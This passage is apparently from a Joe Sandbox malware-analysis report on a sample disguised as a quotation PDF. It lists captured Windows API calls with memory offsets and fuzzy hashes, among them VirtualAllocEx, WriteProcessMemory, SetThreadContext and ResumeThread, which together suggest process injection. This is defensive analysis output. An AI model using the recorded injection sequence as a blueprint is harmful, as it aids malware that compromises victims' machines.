                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0305D0F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 817f5cd272a7fbdc0c55ab5a9c6bd7193382740f4e5e562f70dc08d2029739ee
                                                                                      • Instruction ID: d73037799a3f548f14ec7990c0f6df41bca67fe9b35b6e3ac92286166cda3b39
                                                                                      • Opcode Fuzzy Hash: 817f5cd272a7fbdc0c55ab5a9c6bd7193382740f4e5e562f70dc08d2029739ee
                                                                                      • Instruction Fuzzy Hash: 4A717BB4D01218DFDF60CFA9D984ADEBBF1BB09304F1491AAE818B7211D770AA85CF55
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 03050131
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 87c25b644dabafef1489cd0acce713fce1f733306b2126083dc9e095e1c17b21
                                                                                      • Instruction ID: 1f8629244b0ced24d5bc2f8434540449c14ae705c8d76b4678e30e4746486fe5
                                                                                      • Opcode Fuzzy Hash: 87c25b644dabafef1489cd0acce713fce1f733306b2126083dc9e095e1c17b21
                                                                                      • Instruction Fuzzy Hash: 475129B1D043588FDB11CFA8C841B9EBBF5BF4A300F14809AD549EB252DB746A89CF95
                                                                                      APIs
                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0A0858BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText
                                                                                      • String ID:
                                                                                      • API String ID: 2175133113-0
                                                                                      • Opcode ID: 659c181e7f3363cfdc23720cda408d96447b2f58f6af48457435893cf163e86a
                                                                                      • Instruction ID: 596d5cf132c9ddb6f4f80c8ee28f64650fff3c6e5fd7c941a4a70e53ee82b32f
                                                                                      • Opcode Fuzzy Hash: 659c181e7f3363cfdc23720cda408d96447b2f58f6af48457435893cf163e86a
                                                                                      • Instruction Fuzzy Hash: 2C5143B8D01258DFDB10CFA9D984ADEFBF1BB09310F24902AE818BB221D375A945CF54
                                                                                      APIs
                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0A0858BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText
                                                                                      • String ID:
                                                                                      • API String ID: 2175133113-0
                                                                                      • Opcode ID: 777af2857f83fcce32cd45737ad6023d8bc55291925b69f0016d48d152909c9d
                                                                                      • Instruction ID: b6535bd159840aad14630f92b257e7398f8111aeddb144261409079e6e7e84f7
                                                                                      • Opcode Fuzzy Hash: 777af2857f83fcce32cd45737ad6023d8bc55291925b69f0016d48d152909c9d
                                                                                      • Instruction Fuzzy Hash: 995145B8D01258DFDB10CFAAD984A9EFBF1BB09310F24902AE818BB211D375A945CF54
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 03050131
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 55808175d6e2bd1151cdbf5f1ffb6ceef9230373361c6827c9035a3e8d560465
                                                                                      • Instruction ID: a57971169af4b2a149ebd1a47fb649241786463c91d0af485487b2f8bbff9654
                                                                                      • Opcode Fuzzy Hash: 55808175d6e2bd1151cdbf5f1ffb6ceef9230373361c6827c9035a3e8d560465
                                                                                      • Instruction Fuzzy Hash: 5C51D4B1D002198FDB20DFA9C845BDEBBF5BF49300F1080AAD509BB251DB716A89CF95
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A1BDC8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: e39625b067aa795b2b830d64223f22a46e66b86399e7a9e723917c77e5171156
                                                                                      • Instruction ID: 6d7044f6cb3d9b8913aec0cf3a618e9c94cbf62efac8ac4149e1541773669ecf
                                                                                      • Opcode Fuzzy Hash: e39625b067aa795b2b830d64223f22a46e66b86399e7a9e723917c77e5171156
                                                                                      • Instruction Fuzzy Hash: 724199B4D012589FCF04CFA9D984AEEFBF1BB49310F20902AE818B7250D775AA45CF64
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0305894B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 97e1e0c2f86bdf3ceda5d196858703e099fc13f6e81e2b25811118978b9b388f
                                                                                      • Instruction ID: 691d3a705e34910cd555528a4cd18849213e16e0e6598e10df046b4e2c36a9ac
                                                                                      • Opcode Fuzzy Hash: 97e1e0c2f86bdf3ceda5d196858703e099fc13f6e81e2b25811118978b9b388f
                                                                                      • Instruction Fuzzy Hash: 644176B9D002589FCB00CFA9D984AEEBBF5BF49310F24946AE958BB310D335A945CF54
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A1BDDC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: 2e69878fcad7e18ee8db1c8f2f25b6633064aaa0c2efd574f7c957b31ada5d56
                                                                                      • Instruction ID: ee10f73d9b1ff4b279dbe7228e0208c8c1232f7e31eec554c673cf88a8fff102
                                                                                      • Opcode Fuzzy Hash: 2e69878fcad7e18ee8db1c8f2f25b6633064aaa0c2efd574f7c957b31ada5d56
                                                                                      • Instruction Fuzzy Hash: 7741A8B4D042589FCF14CFAAE884AEEFBB1BB49310F14942AE855B7250C735A946CF64
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0305894B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 7b64c9875d7f7e3f522d1f30e39739502c434f773caf10a265115e672883233f
                                                                                      • Instruction ID: 545e9df93f834fd43bd1464c4bc05741ffbc688b0762af6210e636ae3a22daba
                                                                                      • Opcode Fuzzy Hash: 7b64c9875d7f7e3f522d1f30e39739502c434f773caf10a265115e672883233f
                                                                                      • Instruction Fuzzy Hash: 6E4164B9D002589FCB00CFAAD984ADEBBF5BB09310F14902AE918BB310D335A945CF54
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A1BDDC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: 46717b59c14cdab5c0d2065bc2dc2857d5f63c0794cf05eb9ba3158964a182b7
                                                                                      • Instruction ID: c64981f46597b3d3432411a61fa399b3a22e2290acbb15adabf722a255cdcd97
                                                                                      • Opcode Fuzzy Hash: 46717b59c14cdab5c0d2065bc2dc2857d5f63c0794cf05eb9ba3158964a182b7
                                                                                      • Instruction Fuzzy Hash: E841A9B4D00258DFCF14CFAAD884AEEFBB1BB49310F10942AE815B7240C735A945CF68
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 018C850F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: c40396957f01655931ea1e6607ea8613a27a77ba385fd6fbd30eea550dc7f600
                                                                                      • Instruction ID: c017ab9d81640afc2c823e81935cf3cab1c5ee8d1eed630916ceaea4e8445862
                                                                                      • Opcode Fuzzy Hash: c40396957f01655931ea1e6607ea8613a27a77ba385fd6fbd30eea550dc7f600
                                                                                      • Instruction Fuzzy Hash: A241B9B9D002589FCB10CFA9D484AEEFFF0AF1A310F14906AE854B7250D374AA45CF64
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A1BDB42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: f9cb3c82dd8bdfc97de8e7a068d16c4139f4d746e49dd95159c4c95d4cf12b73
                                                                                      • Instruction ID: e0c60a24e29bf42d4d9a7612ff900ef8a33b6245fd7970a1498ba0b86fb6d66b
                                                                                      • Opcode Fuzzy Hash: f9cb3c82dd8bdfc97de8e7a068d16c4139f4d746e49dd95159c4c95d4cf12b73
                                                                                      • Instruction Fuzzy Hash: BE3198B8D00258DFCF14CFA9E984ADEFBB1BB49310F10942AE815B7210D735A946CF68
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A1BDB42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 1bf35d330ee092d46d2527adf2136318f83cbb40e466ce2c6261bb0124c8acbe
                                                                                      • Instruction ID: c9d8daa24c04cfad0801245a44927e382f16e890869481e43c6316efbabb818c
                                                                                      • Opcode Fuzzy Hash: 1bf35d330ee092d46d2527adf2136318f83cbb40e466ce2c6261bb0124c8acbe
                                                                                      • Instruction Fuzzy Hash: F03187B8D00258DFCF14CFA9E984ADEFBB1BB49310F10942AE815B7250D735A946CF68
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0A1BDA1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: 0009098bfc6d88d69b6b59bba52558d897ec9fa29376a4b826cb2d4486fe6f1f
                                                                                      • Instruction ID: fd4996b8513a691709aefbbfa9ff4cc3015b0ba832e87dd601e183252787a7e4
                                                                                      • Opcode Fuzzy Hash: 0009098bfc6d88d69b6b59bba52558d897ec9fa29376a4b826cb2d4486fe6f1f
                                                                                      • Instruction Fuzzy Hash: 7F41CBB4D152589FCB14CFAAD884AEEFFF1AF49314F24802AE419B7240C778A946CF54
                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0305F761
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 6d8df2e872ab1e95031eecd8c5ef439b168d32c1b4650b98869a323e82199e96
                                                                                      • Instruction ID: 26ce947677b7c408122a66f1870ee262eeb1f8183a1fe0e4af38abd167ac3164
                                                                                      • Opcode Fuzzy Hash: 6d8df2e872ab1e95031eecd8c5ef439b168d32c1b4650b98869a323e82199e96
                                                                                      • Instruction Fuzzy Hash: 5E413AB9911309CFCB14DF99C488AABBBF5FF88314F25C459E519A7321D774A841CBA0
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 018C850F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 54fdf368e8e2ed5b2730b0d393e3e0e8643f79c7a36d3979964bb1b408a8942a
                                                                                      • Instruction ID: 1201035360ba0382778648ce391516720b58c9bb6814cc68dc7c88b00289609d
                                                                                      • Opcode Fuzzy Hash: 54fdf368e8e2ed5b2730b0d393e3e0e8643f79c7a36d3979964bb1b408a8942a
                                                                                      • Instruction Fuzzy Hash: 4A3199B9D002589FCB10CFA9D884ADEFBF1BB19310F14902AE814B7350D775AA45CF64
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0A1BDA1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: d5c68c798f470b3ac2d029fa86d2b112b5f76771c0b7748dc70ce6a2e97761f8
                                                                                      • Instruction ID: 16313003e2276651d8ea943dd7a308a07d3db88bad14e42cd3e352f46a34f785
                                                                                      • Opcode Fuzzy Hash: d5c68c798f470b3ac2d029fa86d2b112b5f76771c0b7748dc70ce6a2e97761f8
                                                                                      • Instruction Fuzzy Hash: 1C31CBB4D112589FCB14CFAAD884AEEFBF1BF49310F24802AE419B7240D778A945CF54
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 12511C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1726298566.0000000012510000.00000040.00000800.00020000.00000000.sdmp, Offset: 12510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12510000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      • Opcode ID: 37f8a82899f47696e2ec62f054a97e8188ecfa41e85854e376512b87a0cbe454
                                                                                      • Instruction ID: 44f5d380ec66a4c2c6c11417c32345a31b0556d136a00b2229342ee2657d1454
                                                                                      • Opcode Fuzzy Hash: 37f8a82899f47696e2ec62f054a97e8188ecfa41e85854e376512b87a0cbe454
                                                                                      • Instruction Fuzzy Hash: CB3198B9D05248AFCB10CFA9E580ADEFBF1AB49314F14906AE819BB310C735A945CF64
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 12511C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1726298566.0000000012510000.00000040.00000800.00020000.00000000.sdmp, Offset: 12510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12510000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      • Opcode ID: c7316d7ff4d7701f2d5e58ef7834fc63a3449d0ec7fa1cdf3f0742e987c23f70
                                                                                      • Instruction ID: 1429912e125eecd80c22a2fbebc0652fa336d133650249d4fcfeeeaca0c99097
                                                                                      • Opcode Fuzzy Hash: c7316d7ff4d7701f2d5e58ef7834fc63a3449d0ec7fa1cdf3f0742e987c23f70
                                                                                      • Instruction Fuzzy Hash: 193198B9D042589FCB10CFA9E584ADEFBF5AB09310F10906AE818BB310D375A945CF64
                                                                                      APIs
                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 018CA852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugOutputString
                                                                                      • String ID:
                                                                                      • API String ID: 1166629820-0
                                                                                      • Opcode ID: d58d89530e423fe4a90159823497e13d7e3e54d0e0f7ecd01e9c9519e6737814
                                                                                      • Instruction ID: ab3303b97f31ee306cb9992c8f88138c86278ced53a531bf4cd6f1da0206a019
                                                                                      • Opcode Fuzzy Hash: d58d89530e423fe4a90159823497e13d7e3e54d0e0f7ecd01e9c9519e6737814
                                                                                      • Instruction Fuzzy Hash: 0C31BAB4D0024C9FCB14CFAAD484ADEFBF1AB48314F14902AE818B7360D734A945CFA4
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(?), ref: 030564D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712843253.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_3050000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 2d5127234b3ab738363d64caf133ed75b25a3939f3b557e80030d2cdc365f023
                                                                                      • Instruction ID: 13476c04446c10a517136ff8f01ecb651886055ec57a9e5be2a80f2aa738952e
                                                                                      • Opcode Fuzzy Hash: 2d5127234b3ab738363d64caf133ed75b25a3939f3b557e80030d2cdc365f023
                                                                                      • Instruction Fuzzy Hash: 0731A7B4D0125C9FCB14CFAAD984ADEFBF5AB49310F14906AE818B7320D335A945CFA4
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 0A1BD4C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 482ece4d21c1a5b91dc604a337c07683f7a4ac721abe666721f7a9dfc1703d0e
                                                                                      • Instruction ID: e3f0123d8ccce0ee35a1937bd1ec1765d855d8969e3f67b974ab27cb7827f84a
                                                                                      • Opcode Fuzzy Hash: 482ece4d21c1a5b91dc604a337c07683f7a4ac721abe666721f7a9dfc1703d0e
                                                                                      • Instruction Fuzzy Hash: 0631ADB4D112589FCB14CFAAE585AEEFBF1AF49310F24942AE419B7340C735A941CF54
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 0A1BD4C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 30283ba49f4f25ca729c3c25860455d3f4438f70cf065640c27f819c8dff4b45
                                                                                      • Instruction ID: b4b1a977b22ec03c5e62fb93dbfb6e8220a09b7d133d398f996f313daf15caa6
                                                                                      • Opcode Fuzzy Hash: 30283ba49f4f25ca729c3c25860455d3f4438f70cf065640c27f819c8dff4b45
                                                                                      • Instruction Fuzzy Hash: 8631AAB4D112189FCB14CFAAE985ADEFBF5AF49310F14942AE819B7340C735A941CF68
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?), ref: 018CA92E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: b269788125a36e20d3b5042965da671c13485c12336c91b85e4ac0c7832858ab
                                                                                      • Instruction ID: 947bde71f449c24741f7570d8fdf1bc7b44a9ca88cdbb62815674cfe8a4b82ce
                                                                                      • Opcode Fuzzy Hash: b269788125a36e20d3b5042965da671c13485c12336c91b85e4ac0c7832858ab
                                                                                      • Instruction Fuzzy Hash: 8D31CCB8D0021C9FCB14CFA9E484AEEFBF4AB09310F10905AE914B3350D334AA45CFA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1709856378.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_127d000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f73406fec12281ada8109e8aa163e9df27e9c277ef6fe06cfc43e2f2cde17d7
                                                                                      • Instruction ID: 4bab86ce08ecca4b14d78674806a8232dd89df2b5c66484569607c6d81ed24bb
                                                                                      • Opcode Fuzzy Hash: 6f73406fec12281ada8109e8aa163e9df27e9c277ef6fe06cfc43e2f2cde17d7
                                                                                      • Instruction Fuzzy Hash: CA2128B1514209EFDB05DF58D9D0B67BF65FF94320F24C569D9090B246C336E416C7A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 57194276ae5eb94bd88c99b32501c17cd5a7568f081af4097c628a4c31378416
                                                                                      • Instruction ID: 01ca15f78de72cd237323b4ba73deae5e777039d2bf535d96444ba0d7634475b
                                                                                      • Opcode Fuzzy Hash: 57194276ae5eb94bd88c99b32501c17cd5a7568f081af4097c628a4c31378416
                                                                                      • Instruction Fuzzy Hash: 29210375614208DFDB15EF58D884B16BBA5EB84314F24C96DD90A4B3C2C376D40BCA61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b35b14d1b2b9ce7bc62956dda91cb99d8e434153e1a7c460e1006976dac9900a
                                                                                      • Instruction ID: 26ebff9cf6b3da27f11fa41384dde8eeb6ba08a8eda1229ff0c388834a9dcd9a
                                                                                      • Opcode Fuzzy Hash: b35b14d1b2b9ce7bc62956dda91cb99d8e434153e1a7c460e1006976dac9900a
                                                                                      • Instruction Fuzzy Hash: 50212871514208DFDB01EF98D5C0B15BBA5FB84324F20C66DD9094B2C7C376D80ACB61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1709856378.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_127d000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                      • Instruction ID: 636c61ae1afea69d974045f76632770e11ebdf343d0768083e6c792952d06ba5
                                                                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                      • Instruction Fuzzy Hash: 4B11EE76504284CFCB02CF44D9C4B56BF72FF84320F24C6A9DA090B656C33AE45ACBA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction ID: d04463f98f42a84acda8252119ff1ec639ee11617c6beeeefeff2b1907759715
                                                                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction Fuzzy Hash: 2111BB75944284DFDB02EF58C5C4B15BBB2FB84324F24C6ADD9494B29BC33AD41ACB61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1710099897.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_128d000_Quotation2025-0107pdf.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                      • Instruction ID: d8d62270be2d8cc665372f1c604c77657a3f1fbf3abea972a46f7333d8e11c25
